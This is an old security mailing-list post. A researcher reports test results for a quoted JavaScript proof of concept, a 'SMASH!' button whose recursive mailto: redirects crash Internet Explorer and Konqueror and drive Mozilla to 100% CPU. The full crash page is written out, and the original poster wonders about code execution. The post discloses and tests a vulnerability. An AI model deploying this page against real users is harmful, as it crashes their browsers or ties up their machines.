After a few minutes' testing it seems this does not only affect Internet
Explorer but also the following browsers:

In KDE's Konqueror latest version it seg faults the browser instantly

In Mozilla 0.99 it causes a Denial of Service situation against the
machine with 100% CPU usage, and some crazy hard drive accessing until
the process is killed

Other information:

Netscape 6 series latest version does nothing when SMASH! is clicked

Galeon latest tries to mail a rather long email address, but the browser
itself is unaffected

Test System:
Linux Redhat 7.3 2.4.18-4 #1 Thu May 2 18:06:25 EDT 2002 i686
---------------------------------
Scott Mackenzie
Cybernetics & Virtual Worlds (2)
Bradford University
http://smackenz.zapto.org
---------------------------------
On Sun, 2002-06-02 at 22:08, Matias Sedalo wrote:
> On 28/07/1999 I discovered a stack buffer overflow caused by, up to
> now, all versions of Internet Explorer.
> On many Windows 98 systems it causes the need to restart the machine, since
> it seems to me that it is left without memory.
> It has only been proven on several version 5 releases of IE on Windows NT
> Server SP6 and Windows 98 Second Edition. As I said before, on Windows 98
> I had to restart it by force.
> Is it possible to execute arbitrary code using the variable company from
> the example?
>
> // internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6
> // internet Explorer 5.00.3500.1003 on Windows98se
>
> -----------cut here---------------------------
> <html><head></head>
> <script language="JAVASCRIPT">
> function hacerMail() {
> var company;
>
> crear();
> address="s0t4ipv6_at_shellcode.com.ar";
> soporte();
> }
> function soporte(){
> var soporte="bill_at_mocosoft.com";
> window.location="mailto:"+address+"?cc="+soporte+"&subject="+company;
> // window.location=company; // also this line cause the bof.
> close(hacerMail());
> }
> function crear(){
> company="shellcode here?\n"; // i don't think so.
> }
> </script>
> <input type="button" onClick="hacerMail();" value="SMASH!"></input>
> </html>
> -----------cut here---------------------------
>
> Regards.
>
> - The Internet is harmful to your health -
> - Law No. 127.0.0.1
>
> Matias Sedalo
> http://www.shellcode.com.ar
>
> s0t4ipv6_at_shellcode.com.ar
> B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2
> .......................................
Received on Jun 03 2002